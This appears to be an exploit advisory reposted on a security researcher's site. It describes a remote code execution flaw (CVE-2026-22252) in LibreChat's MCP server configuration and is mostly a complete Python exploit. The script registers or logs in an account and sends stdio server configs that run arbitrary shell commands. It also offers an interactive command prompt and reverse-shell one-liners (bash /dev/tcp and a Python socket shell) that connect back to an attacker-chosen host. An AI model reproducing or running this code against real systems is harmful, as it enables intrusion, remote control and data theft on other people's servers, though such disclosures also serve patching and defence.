Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

 

 

LibreChat MCP 0.8.2-rc2 Remote Code Execution
LibreChat MCP 0.8.2-rc2 Remote Code Execution
LibreChat MCP 0.8.2-rc2 Remote Code Execution

=============================================================================================================================================
| # Title LibreChat MCP 0.8.2-rc2 Remote Code Execution

=============================================================================================================================================
| # Title : LibreChat MCP 0.8.2-rc2 Remote Code Execution via Unsanitized stdio Server Configuration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.librechat.ai/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/213714/ & CVE-2026-22252

[+] Summary : A critical Remote Code Execution (RCE) vulnerability was identified in LibreChat's Model Context Protocol (MCP) server management functionality.
The issue stems from insufficient validation and restriction of user-supplied MCP server configurations, specifically when using the stdio transport type.
An authenticated attacker can abuse the /api/mcp/servers endpoint to define a malicious MCP server configuration that executes
arbitrary system commands on the host running LibreChat. Because the application directly spawns operating system processes based on user-controlled parameters without
proper sandboxing or allowlisting, this flaw enables full command execution with the privileges of the LibreChat service.
Successful exploitation may lead to complete system compromise, including unauthorized access, data exfiltration, persistence,
and lateral movement within the hosting environment. The vulnerability represents a design-level security flaw rather than a simple input validation issue and poses a severe risk in production deployments.
[+] POC :

#!/usr/bin/env python3

import requests
import json
import sys
import re
import time
import argparse
import signal
import logging
from typing import Optional, Dict, Any, Tuple, List
from dataclasses import dataclass
from enum import Enum
from urllib.parse import urljoin

logging.basicConfig(
level=logging.INFO,
format='%(asctime)s - %(levelname)s - %(message)s'
)
logger = logging.getLogger(__name__)

class TransportType(Enum):

STDIO = "stdio"
SSE = "sse"
HTTP = "http"

@dataclass
class AuthResult:

success: bool
token: Optional[str] = None
cookies: Optional[Dict] = None
session_id: Optional[str] = None
csrf_token: Optional[str] = None
message: str = ""

class LibreChatExploit:
def __init__(self, target_url: str, timeout: int = 30):
self.target_url = target_url.rstrip('/')
self.timeout = timeout

self.session = requests.Session()
self.session.headers.update({
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36',
'Accept': 'application/json, text/plain, */*',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
})

self.auth_result = AuthResult(success=False)
self.csrf_token = None

def _extract_csrf_token(self, response_text: str) -> Optional[str]:

patterns = [
r'name="csrfToken" value="([^"]+)"',
r'"csrfToken":"([^"]+)"',
r'window\.csrfToken = "([^"]+)"',
r'<meta name="csrf-token" content="([^"]+)"',
]

for pattern in patterns:
match = re.search(pattern, response_text)
if match:
return match.group(1)

if 'csrf_token' in self.session.cookies:
return self.session.cookies.get('csrf_token')

return None

def _get_base_endpoints(self) -> Dict[str, str]:

try:

health_check = self.session.get(
f"{self.target_url}/health",
timeout=self.timeout
)

for endpoint in ['/api', '/api/v1', '/api/v2']:
try:
response = self.session.get(
f"{self.target_url}{endpoint}",
timeout=self.timeout,
allow_redirects=False
)
if response.status_code < 400:
logger.info(f"Found API interface at: {endpoint}")
break
except:
continue

except Exception as e:
logger.debug(f"System check failed: {e}")

return {
'register': '/api/auth/register',
'login': '/api/auth/login',
'mcp_servers': '/api/mcp/servers',
'user_info': '/api/auth/me',
}

def check_target(self) -> Tuple[bool, str, Optional[str]]:

try:
response = self.session.get(
self.target_url,
timeout=self.timeout
)

if response.status_code != 200:
return False, "Server unavailable", None

html_content = response.text
indicators = ['LibreChat', 'librechat', 'Evo', 'Next.js', 'authToken']

is_librechat = any(indicator in html_content for indicator in indicators)

if not is_librechat:
return False, "This may not be a LibreChat server", None

version_patterns = [
r'"version":"([^"]+)"',
r'librechat-([\d\.]+)',
r'v(\d+\.\d+\.\d+)',
]

version = None
for pattern in version_patterns:
match = re.search(pattern, html_content)
if match:
version = match.group(1)
break

self.csrf_token = self._extract_csrf_token(html_content)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})

return True, "LibreChat confirmed", version

except requests.RequestException as e:
return False, f"Connection error: {e}", None

def register_user(self, username: str, password: str, email: str) -> bool:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['register'])

headers = {"Content-Type": "application/json"}
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

payload = {
"name": username[:50],
"email": email[:100],
"password": password,
"confirm_password": password,
"username": username[:30]
}

try:
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout
)

logger.debug(f"Registration response: {response.status_code}")

if response.status_code in [200, 201, 302]:
logger.info(f"[?] User registered: {username}")

if 'csrf' in response.text.lower():
self.csrf_token = self._extract_csrf_token(response.text)
if self.csrf_token:
self.session.headers.update({'X-CSRF-Token': self.csrf_token})
return True
else:
logger.warning(f"Registration failed (HTTP {response.status_code}): {response.text[:200]}")
return False

except Exception as e:
logger.error(f"Error during registration: {e}")
return False

def login(self, email: str, password: str) -> AuthResult:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['login'])

headers = {"Content-Type": "application/json"}
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

payload = {"email": email, "password": password}

try:
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout, allow_redirects=True
)

logger.debug(f"Login response: {response.status_code}")

if response.status_code in [200, 201, 302]:

token = None
try:
data = response.json()
token = data.get('token') or data.get('accessToken') or data.get('authToken')
except:
pass

cookies = dict(self.session.cookies) if self.session.cookies else {}

new_csrf = self._extract_csrf_token(response.text)
if new_csrf:
self.csrf_token = new_csrf
self.session.headers.update({'X-CSRF-Token': self.csrf_token})

auth_valid = self._verify_authentication()

self.auth_result = AuthResult(
success=auth_valid,
token=token,
cookies=cookies,
csrf_token=self.csrf_token,
message="Login successful" if auth_valid else "Authentication invalid"
)

if auth_valid:
logger.info("[?] Login and authentication successful")
else:
logger.warning("[!] Login succeeded but session is invalid")

return self.auth_result
else:
error_msg = f"Login failed: {response.status_code}"
if response.text:
error_msg += f" - {response.text[:100]}"
logger.error(error_msg)
return AuthResult(success=False, message=error_msg)

except Exception as e:
error_msg = f"Login error: {e}"
logger.error(error_msg)
return AuthResult(success=False, message=error_msg)

def _verify_authentication(self) -> bool:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['user_info'])
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 200:
user_data = response.json()
return bool(user_data.get('username') or user_data.get('email'))
except:
pass
return False

def check_mcp_endpoint(self) -> Tuple[bool, str]:

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['mcp_servers'])
try:
response = self.session.get(url, timeout=self.timeout)
if response.status_code == 401:
return False, "Authentication required"
elif response.status_code == 403:
return False, "Forbidden - Might require Admin privileges"
elif response.status_code == 404:
return False, "Not Found - Version mismatch"
elif response.status_code == 200:
return True, "Available"
else:
return False, f"Unknown status: {response.status_code}"
except Exception as e:
return False, f"Connection error: {e}"

def execute_command(self, command: str, shell_path: str = None) -> Tuple[bool, str]:

if not self.auth_result.success:
return False, "Unauthorized"

endpoints = self._get_base_endpoints()
url = urljoin(self.target_url, endpoints['mcp_servers'])

shell_path = shell_path or '/bin/sh'

safe_command = f"({command}) 2>&1"

payload = {
"config": {
"type": "stdio",
"title": f"server_{int(time.time())}",
"command": shell_path,
"args": ["-c", safe_command]
}
}

headers = {"Content-Type": "application/json"}
if self.auth_result.token:
headers['Authorization'] = f"Bearer {self.auth_result.token}"
if self.csrf_token:
headers['X-CSRF-Token'] = self.csrf_token

try:
logger.info(f"Sending command to: {url}")
response = self.session.post(
url, json=payload, headers=headers, timeout=self.timeout
)

if response.status_code in [200, 201]:
try:
data = response.json()
error = data.get('error') or data.get('message', '')
if error and 'fail' in error.lower():
return False, f"Server rejected: {error}"
except:
pass
return True, "Command sent"
else:
return False, f"Execution failed: {response.status_code} - {response.text[:200]}"

except requests.Timeout:
return False, "Timeout - Command might be running"
except Exception as e:
return False, f"Error: {e}"

def test_vulnerability(self) -> Tuple[bool, str, Optional[str]]:

test_file = f"/tmp/librechat_test_{int(time.time())}.txt"
test_command = f"id && whoami && hostname && echo 'test' && date > {test_file} 2>&1"

success, message = self.execute_command(test_command)

if success:

return True, "Vulnerability likely exists (Command sent)", None
else:
return False, f"Vulnerability not found: {message}", None

class InteractiveShell:

def __init__(self, exploit: LibreChatExploit):
self.exploit = exploit
self.running = True
signal.signal(signal.SIGINT, self.signal_handler)
signal.signal(signal.SIGTERM, self.signal_handler)

def signal_handler(self, signum, frame):
logger.info("\n[!] Shutdown signal received...")
self.running = False

def run(self):

print("\n" + "="*60)
print("Interactive Mode - Type 'help' for menu")
print("Type 'exit' to quit")
print("="*60)

command_history = []
rate_limit = 1
last_command_time = 0

while self.running:
try:
current_time = time.time()
if current_time - last_command_time < rate_limit:
time.sleep(rate_limit - (current_time - last_command_time))

try:
cmd = input("\nexploit> ").strip()
except EOFError:
break
except KeyboardInterrupt:
continue

if not cmd: continue

last_command_time = time.time()
command_history.append(cmd)

if cmd.lower() == 'exit': break
elif cmd.lower() == 'help': self.show_help()
elif cmd.lower() == 'history':
for i, h in enumerate(command_history[-10:], 1): print(f"{i}: {h}")
elif cmd.lower() == 'status':
print(f"Auth: {'Success' if self.exploit.auth_result.success else 'Failed'}")
print(f"CSRF: {'Present' if self.exploit.csrf_token else 'Missing'}")
elif cmd.lower().startswith('shell'):
self.handle_reverse_shell(cmd)
else:
success, message = self.exploit.execute_command(cmd)
print(f"[{'?' if success else '?'}] {message}")
except Exception as e:
logger.error(f"Shell error: {e}")
time.sleep(1)

def show_help(self):
print("""
Commands:
exit - Exit
help - Show this menu
history - Show last 10 commands
status - Auth status
shell [LHOST] [LPORT] - Spawn reverse shell

Examples: id, pwd, ls -la, cat /etc/passwd
""")

def handle_reverse_shell(self, cmd: str):
parts = cmd.split()
if len(parts) < 3:
print("[!] Usage: shell [LHOST] [LPORT]")
return

lhost, lport = parts[1], parts[2]
print(f"[*] Preparing reverse shell to {lhost}:{lport}")

shells = [
f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'",
f"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'",
]

for i, s_cmd in enumerate(shells, 1):
print(f"[*] Attempting shell #{i}...")
success, message = self.exploit.execute_command(s_cmd)
if success:
print("[?] Shell sent. Check your listener.")
break

def main():
parser = argparse.ArgumentParser(description='LibreChat MCP RCE Exploit')
parser.add_argument('-u', '--url', required=True, help='Target URL')
parser.add_argument('-c', '--command', help='Command to execute')
parser.add_argument('--test', action='store_true', help='Test vulnerability')
parser.add_argument('--interactive', action='store_true', help='Interactive mode')
parser.add_argument('--username', default='test_user')
parser.add_argument('--password', default='Test12345!')
parser.add_argument('--email', default='This email address is being protected from spambots. You need JavaScript enabled to view it.')
parser.add_argument('--timeout', type=int, default=30)
parser.add_argument('--verbose', '-v', action='store_true')

args = parser.parse_args()
if args.verbose: logging.getLogger().setLevel(logging.DEBUG)

print("="*60)
print("LibreChat MCP RCE Exploit - Enhanced")
print("CVE-2026-22252")
print("="*60)

exploit = LibreChatExploit(args.url, args.timeout)

print("[*] Checking target system...")
ok, msg, ver = exploit.check_target()
if not ok:
print(f"[?] {msg}")
sys.exit(1)

print(f"[?] {msg} (Version: {ver or 'Unknown'})")

print(f"\n[*] Authenticating as {args.username}...")
auth = exploit.login(args.email, args.password)

if not auth.success:
print("[*] Attempting registration...")
if exploit.register_user(args.username, args.password, args.email):
auth = exploit.login(args.email, args.password)

if not auth.success:
print(f"[?] Authentication failed: {auth.message}")
sys.exit(1)

print("[?] Authentication successful")

if args.test:
vuln, msg, out = exploit.test_vulnerability()
print(f"\n[{'?' if vuln else '?'}] {msg}")
elif args.command:
success, msg = exploit.execute_command(args.command)
print(f"[{'?' if success else '?'}] {msg}")
elif args.interactive:
shell = InteractiveShell(exploit)
shell.run()

if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("\n[*] Interrupted by user")
sys.exit(0)

Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================

Social Media Share